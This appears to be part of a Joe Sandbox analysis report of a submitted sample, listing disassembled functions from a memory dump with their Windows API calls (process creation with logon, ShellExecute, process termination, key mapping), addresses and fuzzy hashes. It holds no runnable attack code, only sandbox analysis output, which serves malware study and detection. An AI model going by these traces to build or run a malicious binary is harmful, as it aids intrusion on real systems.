                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                • String ID:
                                                • API String ID: 3008561057-0
                                                • Opcode ID: 4da0a6e0e45fd49973f8ec42e1f887c681cf1f5190ee6c258dc5d49234eb325e
                                                • Instruction ID: a306c3febc59018670b8c3e746feebefba4651decdf4236d2cc456a286eb8a99
                                                • Opcode Fuzzy Hash: 4da0a6e0e45fd49973f8ec42e1f887c681cf1f5190ee6c258dc5d49234eb325e
                                                • Instruction Fuzzy Hash: 7111BE71600605FFDB189FA8EC49BAE7FA9FB42355F108018F44597210C735A948EB64
                                                APIs
                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 005714FF
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00571506
                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00571515
                                                • CloseHandle.KERNEL32(00000004), ref: 00571520
                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0057154F
                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 00571563
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                • String ID:
                                                • API String ID: 1413079979-0
                                                • Opcode ID: 0c0604779c7198e041c0ac53323d7efa6ea176cf0264872020bb5f81644529f7
                                                • Instruction ID: 3de88d6edb35001512216c03d84204cd82d6485c888df2724c75c87a67a78cfc
                                                • Opcode Fuzzy Hash: 0c0604779c7198e041c0ac53323d7efa6ea176cf0264872020bb5f81644529f7
                                                • Instruction Fuzzy Hash: FF112972500209ABDF118F98ED49FDE7FAAFF49744F048059FA09A2160C3758E68EB64
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00533379,00532FE5), ref: 00533390
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0053339E
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005333B7
                                                • SetLastError.KERNEL32(00000000,?,00533379,00532FE5), ref: 00533409
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 0814a7d5790b763d352e923930218a73e478aee21eca2a61569909e4f3576635
                                                • Instruction ID: f693e8de9a1fddd44ff4ea10a9246f772a41f29b1619651dd54edb8fdbc2cff6
                                                • Opcode Fuzzy Hash: 0814a7d5790b763d352e923930218a73e478aee21eca2a61569909e4f3576635
                                                • Instruction Fuzzy Hash: 4201243320A313BEAB2527757C8E66B6F94FB65379F20862BF411812F0EF115D09E544
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00545686,00553CD6,?,00000000,?,00545B6A,?,?,?,?,?,0053E6D1,?,005D8A48), ref: 00542D78
                                                • _free.LIBCMT ref: 00542DAB
                                                • _free.LIBCMT ref: 00542DD3
                                                • SetLastError.KERNEL32(00000000,?,?,?,?,0053E6D1,?,005D8A48,00000010,00514F4A,?,?,00000000,00553CD6), ref: 00542DE0
                                                • SetLastError.KERNEL32(00000000,?,?,?,?,0053E6D1,?,005D8A48,00000010,00514F4A,?,?,00000000,00553CD6), ref: 00542DEC
                                                • _abort.LIBCMT ref: 00542DF2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free$_abort
                                                • String ID:
                                                • API String ID: 3160817290-0
                                                • Opcode ID: 62cfb83b7b5bef5b7d563da29e61da4aeff2f3a90bfebd958c39198c6cdece49
                                                • Instruction ID: f5cbab5f9bf341c041b5f3053ea48a15feefdc3825c3808692b893db0908a8b7
                                                • Opcode Fuzzy Hash: 62cfb83b7b5bef5b7d563da29e61da4aeff2f3a90bfebd958c39198c6cdece49
                                                • Instruction Fuzzy Hash: 02F0F935905A2227C72223356C0EBDA3E65BFD276CF640416F424921D1DE7088065120
                                                APIs
                                                  • Part of subcall function 00529639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00529693
                                                  • Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296A2
                                                  • Part of subcall function 00529639: BeginPath.GDI32(?), ref: 005296B9
                                                  • Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296E2
                                                • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 005A8A4E
                                                • LineTo.GDI32(?,00000003,00000000), ref: 005A8A62
                                                • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 005A8A70
                                                • LineTo.GDI32(?,00000000,00000003), ref: 005A8A80
                                                • EndPath.GDI32(?), ref: 005A8A90
                                                • StrokePath.GDI32(?), ref: 005A8AA0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                • String ID:
                                                • API String ID: 43455801-0
                                                • Opcode ID: 880811f625384f7cafed96dc88a10d03216ccd5bd4fa63b78743ad497293b7c0
                                                • Instruction ID: d6a9bafa926ed9261b32c204509212f39831f4894a095bc47e0e22db3f1a9880
                                                • Opcode Fuzzy Hash: 880811f625384f7cafed96dc88a10d03216ccd5bd4fa63b78743ad497293b7c0
                                                • Instruction Fuzzy Hash: 12110976000149FFDB129F90DC88EAE7FACFB1A350F008052BA199A1A1C7719D59EBA0
                                                APIs
                                                • GetDC.USER32(00000000), ref: 00575218
                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 00575229
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00575230
                                                • ReleaseDC.USER32(00000000,00000000), ref: 00575238
                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0057524F
                                                • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00575261
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CapsDevice$Release
                                                • String ID:
                                                • API String ID: 1035833867-0
                                                • Opcode ID: ce413d83f2e67e5c5b2219b6865e6ddd81dea95bc3f1141dc53e6be5b01bbaae
                                                • Instruction ID: ad0b1388eaca1b18f430a971a13d0f30a7ef8ad6dc48fd6bf1e412b1780d21bf
                                                • Opcode Fuzzy Hash: ce413d83f2e67e5c5b2219b6865e6ddd81dea95bc3f1141dc53e6be5b01bbaae
                                                • Instruction Fuzzy Hash: 34014F75E00719BBEB109FA59C49A5EBFB8FB59751F044065FA04A7281D6709C04DBA0
                                                APIs
                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00511BF4
                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00511BFC
                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00511C07
                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00511C12
                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00511C1A
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00511C22
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Virtual
                                                • String ID:
                                                • API String ID: 4278518827-0
                                                • Opcode ID: b6fc38aaa8901985c9f2a787d21690b57a47ac0ad622e25252784ae949c0b537
                                                • Instruction ID: 8104bd8a3a16777a0100d31c6e56535fe1fec174e2b76d9ba146ccab654f1ad9
                                                • Opcode Fuzzy Hash: b6fc38aaa8901985c9f2a787d21690b57a47ac0ad622e25252784ae949c0b537
                                                • Instruction Fuzzy Hash: 56016CB09027597DE3008F5A8C85B52FFE8FF19354F04411B915C4B941C7F5A864CBE5
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0057EB30
                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0057EB46
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 0057EB55
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057EB64
                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057EB6E
                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057EB75
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                • String ID:
                                                • API String ID: 839392675-0
                                                • Opcode ID: cb8b2c5986061f3ecbe7529d368d2e85f1512affa14f6e349cd04dc55f1f8ae4
                                                • Instruction ID: fc39b818e2df40502db5299f8939906dcd16140d734222746a9f8807cb6daf27
                                                • Opcode Fuzzy Hash: cb8b2c5986061f3ecbe7529d368d2e85f1512affa14f6e349cd04dc55f1f8ae4
                                                • Instruction Fuzzy Hash: E4F05E72240158BFE7219B669C0EEEF3E7CEFDBB11F004159F601D6091EBA05A05E6B5
                                                APIs
                                                • GetClientRect.USER32(?), ref: 00567452
                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 00567469
                                                • GetWindowDC.USER32(?), ref: 00567475
                                                • GetPixel.GDI32(00000000,?,?), ref: 00567484
                                                • ReleaseDC.USER32(?,00000000), ref: 00567496
                                                • GetSysColor.USER32(00000005), ref: 005674B0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                • String ID:
                                                • API String ID: 272304278-0
                                                • Opcode ID: 2ded65c8e3c2f113880d184c2ae073f1e8081e6a7966a9bfc89ba16d13495d4a
                                                • Instruction ID: d1812f9935a0adfe8a119fd6e5cfcef09dae11d2db8d67be07d1dd61e9215de1
                                                • Opcode Fuzzy Hash: 2ded65c8e3c2f113880d184c2ae073f1e8081e6a7966a9bfc89ba16d13495d4a
                                                • Instruction Fuzzy Hash: 71018B31400219EFDB109F64DD08BAA7FB5FF19312F1004A0FA16A31A0CF311E45EB50
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0057187F
                                                • UnloadUserProfile.USERENV(?,?), ref: 0057188B
                                                • CloseHandle.KERNEL32(?), ref: 00571894
                                                • CloseHandle.KERNEL32(?), ref: 0057189C
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 005718A5
                                                • HeapFree.KERNEL32(00000000), ref: 005718AC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                • String ID:
                                                • API String ID: 146765662-0
                                                • Opcode ID: 7b1f133492d5ece76174093fd546ca3583e09e08d24f743fd9ffd3a0e52d2b78
                                                • Instruction ID: 53388d2a26a516a9766c5c590047ea269dd84adecef78addd8aa7507263693c6
                                                • Opcode Fuzzy Hash: 7b1f133492d5ece76174093fd546ca3583e09e08d24f743fd9ffd3a0e52d2b78
                                                • Instruction Fuzzy Hash: 63E0E536204101BBDB015FA1ED0C90ABF79FF6AB22B108625F22581070CB329425EF50
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 0051BEB3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: D%^$D%^$D%^$D%^D%^
                                                • API String ID: 1385522511-1929028606
                                                • Opcode ID: ee0637ec5ae8d1e99c32a99323fdec80142ee181e792a72d4f7fcefe397a9730
                                                • Instruction ID: 6f991f027e25756a3003fd0b7dcf529f9e945aea5314bd44430ac6a76bf9f4a1
                                                • Opcode Fuzzy Hash: ee0637ec5ae8d1e99c32a99323fdec80142ee181e792a72d4f7fcefe397a9730
                                                • Instruction Fuzzy Hash: D6913875A0020ACFEB18CF59C0906EABBF1FF58314F24856AD985AB351E731AD81DBD0
                                                APIs
                                                  • Part of subcall function 00530242: EnterCriticalSection.KERNEL32(005E070C,005E1884,?,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053024D
                                                  • Part of subcall function 00530242: LeaveCriticalSection.KERNEL32(005E070C,?,0052198B,005E2518,?,?,?,005112F9,00000000), ref: 0053028A
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                  • Part of subcall function 005300A3: __onexit.LIBCMT ref: 005300A9
                                                • __Init_thread_footer.LIBCMT ref: 00597BFB
                                                  • Part of subcall function 005301F8: EnterCriticalSection.KERNEL32(005E070C,?,?,00528747,005E2514), ref: 00530202
                                                  • Part of subcall function 005301F8: LeaveCriticalSection.KERNEL32(005E070C,?,00528747,005E2514), ref: 00530235
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                • String ID: +TV$5$G$Variable must be of type 'Object'.
                                                • API String ID: 535116098-200929741
                                                • Opcode ID: 48dc413d81cd788be3cb353284e0215ff9e5569f412c98056682657defb21b42
                                                • Instruction ID: 5f0fb7d791387c32185073a1c367636e123ab176c65c60e18ac2b4aa22c28088
                                                • Opcode Fuzzy Hash: 48dc413d81cd788be3cb353284e0215ff9e5569f412c98056682657defb21b42
                                                • Instruction Fuzzy Hash: 8A919D74A1420AEFCF04EF54D8959ADBFB5FF89300F14845AF8469B292DB71AE81CB50
                                                APIs
                                                  • Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625
                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0057C6EE
                                                • _wcslen.LIBCMT ref: 0057C735
                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0057C79C
                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0057C7CA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info_wcslen$Default
                                                • String ID: 0
                                                • API String ID: 1227352736-4108050209
                                                • Opcode ID: 3fd393b5792759dafc95e2defe1e60a87d8efefa5b2dae27fc8ef2cce0cb0728
                                                • Instruction ID: a3dda11ab15fac253c6db574705e2fd073e956b4adf7794585aac684035722c4
                                                • Opcode Fuzzy Hash: 3fd393b5792759dafc95e2defe1e60a87d8efefa5b2dae27fc8ef2cce0cb0728
                                                • Instruction Fuzzy Hash: 9C51DF716043019BD7199F28E889B6B7FE8FF89310F048A2DF999D31D1DB70D944AB52
                                                APIs
                                                • ShellExecuteExW.SHELL32(0000003C), ref: 0059AEA3
                                                  • Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625
                                                • GetProcessId.KERNEL32(00000000), ref: 0059AF38
                                                • CloseHandle.KERNEL32(00000000), ref: 0059AF67
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CloseExecuteHandleProcessShell_wcslen
                                                • String ID: <$@
                                                • API String ID: 146682121-1426351568
                                                • Opcode ID: f1d1d86bac1d1007f8e0dc77f8cd5eedb306a02c3a534276944668214863cc78
                                                • Instruction ID: 90671fb062b8a2f915692e78eef52098666e0e30d31774189c009a972bd22642
                                                • Opcode Fuzzy Hash: f1d1d86bac1d1007f8e0dc77f8cd5eedb306a02c3a534276944668214863cc78
                                                • Instruction Fuzzy Hash: 55715574A0021A9FDF14DF54C488A9EBBF5FF48300F048499E816AB392DB31ED85CBA1
                                                APIs
                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00577206
                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0057723C
                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0057724D
                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 005772CF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                • String ID: DllGetClassObject
                                                • API String ID: 753597075-1075368562
                                                • Opcode ID: 80f6784be5d728d7666e60af358c3003d011ee086498d1c3f4699d5c60d96ee3
                                                • Instruction ID: da2a720d7b9e695153c1b04487fd3d582e97116edaf2c8853fbfc902e3e55f44
                                                • Opcode Fuzzy Hash: 80f6784be5d728d7666e60af358c3003d011ee086498d1c3f4699d5c60d96ee3
                                                • Instruction Fuzzy Hash: BE417F75604208EFDB15CF54E884A9A7FB9FF49310F14C4A9BD199F20AD7B0DA44EBA0
                                                APIs
                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 005A2F8D
                                                • LoadLibraryW.KERNEL32(?), ref: 005A2F94
                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 005A2FA9
                                                • DestroyWindow.USER32(?), ref: 005A2FB1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                • String ID: SysAnimate32
                                                • API String ID: 3529120543-1011021900
                                                • Opcode ID: 03ab5e489a4027317a90e1f0d6a2ae0bb6f6a0279b32785d7187ffa461151d4c
                                                • Instruction ID: 96ab904e3b7256b38d47e8eba9819b34847afc57450e7fba80572e2985b0c4f6
                                                • Opcode Fuzzy Hash: 03ab5e489a4027317a90e1f0d6a2ae0bb6f6a0279b32785d7187ffa461151d4c
                                                • Instruction Fuzzy Hash: CF219A71204209AFEB108F68DC87EBF3BB9FB5A364F104619FA50D6190D771DC91AB60
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00534D1E,005428E9,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002), ref: 00534D8D
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00534DA0
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00534D1E,005428E9,?,00534CBE,005428E9,005D88B8,0000000C,00534E15,005428E9,00000002,00000000), ref: 00534DC3
                                                Strings
